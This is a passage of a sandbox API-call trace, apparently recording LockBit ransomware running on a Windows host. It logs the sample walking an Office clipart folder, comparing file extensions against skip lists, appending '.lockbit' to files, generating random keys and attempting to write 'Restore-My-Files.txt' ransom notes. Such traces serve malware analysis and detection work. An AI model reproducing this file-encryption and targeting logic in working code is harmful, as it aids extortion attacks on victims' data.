(lpString1=".msc", lpString2=".GIF") returned 1 [0180.330] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0180.330] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0180.330] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0180.330] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0180.330] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0180.330] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0180.330] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0180.330] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0180.330] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0180.330] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0180.330] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0180.330] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.330] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0180.330] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0180.330] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0180.330] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0180.330] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01292_.GIF") returned -1 [0180.330] lstrcmpiW (lpString1="ntldr", lpString2="WB01292_.GIF") returned -1 [0180.330] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01292_.GIF") returned -1 [0180.330] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01292_.GIF") returned -1 [0180.330] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01292_.GIF") returned -1 [0180.330] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01292_.GIF") returned -1 [0180.330] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01292_.GIF") returned -1 [0180.330] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0180.331] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01292_.GIF") returned=".GIF" [0180.331] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0180.331] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0180.331] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0180.331] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0180.331] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0180.331] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0180.331] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0180.331] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0180.331] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0180.331] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0180.331] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0180.331] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0180.331] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0180.331] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0180.331] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0180.331] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0180.331] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0180.331] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0180.331] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0180.331] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0180.331] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0180.331] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0180.331] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0180.331] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0180.331] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0180.331] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0180.331] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0180.331] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0180.331] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01292_.GIF.lockbit") returned 72 [0180.331] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01292_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01292_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0180.333] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0180.333] malloc (_Size=0x40068) returned 0x3df0008 [0180.333] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=597) returned 1 [0180.333] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.333] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0180.333] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.334] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0180.334] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0180.337] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01292_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01292_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0180.337] malloc (_Size=0xa6) returned 0x1fa2ed8 [0180.337] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0180.337] free (_Block=0x1fa2ed8) [0180.337] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01292_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0180.337] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0180.337] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0180.337] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc0fec00, ftCreationTime.dwHighDateTime=0x1bd4e67, ftLastAccessTime.dwLowDateTime=0x70875130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbc0fec00, ftLastWriteTime.dwHighDateTime=0x1bd4e67, nFileSizeHigh=0x0, nFileSizeLow=0x2a7, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01293_.GIF", cAlternateFileName="")) returned 1 [0180.337] lstrcmpiW (lpString1=".", lpString2="WB01293_.GIF") returned -1 [0180.337] lstrcmpiW (lpString1="..", lpString2="WB01293_.GIF") returned -1 [0180.337] PathFindExtensionW (pszPath="WB01293_.GIF") returned=".GIF" [0180.337] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0180.337] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0180.337] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0180.337] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0180.337] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0180.338] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0180.338] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0180.338] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0180.338] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0180.338] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0180.338] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0180.338] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0180.338] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0180.338] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0180.338] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0180.338] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0180.338] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0180.338] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0180.338] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0180.338] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0180.338] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0180.338] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0180.338] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0180.338] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0180.338] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.338] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0180.338] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0180.338] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0180.338] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0180.338] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0180.338] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0180.338] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0180.338] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0180.338] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0180.338] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0180.338] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0180.338] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0180.338] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0180.339] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0180.339] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0180.339] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0180.339] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0180.339] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.339] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0180.339] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0180.339] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0180.339] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0180.339] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01293_.GIF") returned -1 [0180.339] lstrcmpiW (lpString1="ntldr", lpString2="WB01293_.GIF") returned -1 [0180.339] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01293_.GIF") returned -1 [0180.339] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01293_.GIF") returned -1 [0180.339] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01293_.GIF") returned -1 [0180.339] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01293_.GIF") returned -1 [0180.339] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01293_.GIF") returned -1 [0180.339] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0180.339] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01293_.GIF") returned=".GIF" [0180.339] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0180.339] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0180.339] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0180.339] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0180.339] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0180.339] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0180.339] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0180.339] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0180.339] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0180.339] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0180.339] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0180.339] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0180.339] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0180.339] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0180.339] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0180.340] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0180.340] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0180.340] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0180.340] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0180.340] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0180.340] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0180.340] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0180.340] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0180.340] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0180.340] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0180.340] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0180.340] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0180.340] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0180.340] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01293_.GIF.lockbit") returned 72 [0180.340] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01293_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01293_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0180.349] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0180.350] malloc (_Size=0x40068) returned 0x3df0008 [0180.350] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=679) returned 1 [0180.350] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.350] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.350] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0180.350] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.351] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0180.351] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0180.354] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01293_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01293_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0180.354] malloc (_Size=0xa6) returned 0x1fa2ed8 [0180.354] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0180.354] free (_Block=0x1fa2ed8) [0180.354] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01293_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0180.354] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0180.354] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0180.354] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0242a00, ftCreationTime.dwHighDateTime=0x1bd4e67, ftLastAccessTime.dwLowDateTime=0x70875130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb0242a00, ftLastWriteTime.dwHighDateTime=0x1bd4e67, nFileSizeHigh=0x0, nFileSizeLow=0x2ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01294_.GIF", cAlternateFileName="")) returned 1 [0180.355] lstrcmpiW (lpString1=".", lpString2="WB01294_.GIF") returned -1 [0180.355] lstrcmpiW (lpString1="..", lpString2="WB01294_.GIF") returned -1 [0180.355] PathFindExtensionW (pszPath="WB01294_.GIF") returned=".GIF" [0180.355] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0180.355] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0180.355] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0180.355] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0180.355] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0180.355] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0180.355] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0180.355] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0180.355] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0180.355] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0180.355] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0180.355] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0180.355] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0180.355] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0180.355] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0180.355] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0180.355] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0180.355] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0180.355] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0180.355] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0180.355] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0180.355] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0180.355] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0180.355] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0180.355] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.355] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0180.355] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0180.355] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0180.356] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0180.356] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0180.356] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0180.356] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0180.356] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0180.356] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0180.356] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0180.356] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0180.356] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0180.356] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0180.356] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0180.356] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0180.356] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0180.356] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0180.356] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.356] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0180.356] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0180.356] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0180.356] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0180.356] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01294_.GIF") returned -1 [0180.356] lstrcmpiW (lpString1="ntldr", lpString2="WB01294_.GIF") returned -1 [0180.356] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01294_.GIF") returned -1 [0180.356] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01294_.GIF") returned -1 [0180.356] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01294_.GIF") returned -1 [0180.356] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01294_.GIF") returned -1 [0180.356] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01294_.GIF") returned -1 [0180.356] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0180.356] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01294_.GIF") returned=".GIF" [0180.356] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0180.356] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0180.356] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0180.356] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0180.356] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0180.357] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0180.357] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0180.357] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0180.357] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0180.357] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0180.357] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0180.357] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0180.357] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0180.357] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0180.357] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0180.357] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0180.357] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0180.357] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0180.357] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0180.357] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0180.357] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0180.357] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0180.357] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0180.357] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0180.357] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0180.357] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0180.357] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0180.357] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0180.357] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01294_.GIF.lockbit") returned 72 [0180.357] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01294_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01294_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0180.358] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0180.359] malloc (_Size=0x40068) returned 0x3df0008 [0180.359] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=685) returned 1 [0180.359] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.359] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.359] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0180.359] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.360] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.360] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0180.360] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0180.363] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01294_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01294_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0180.363] malloc (_Size=0xa6) returned 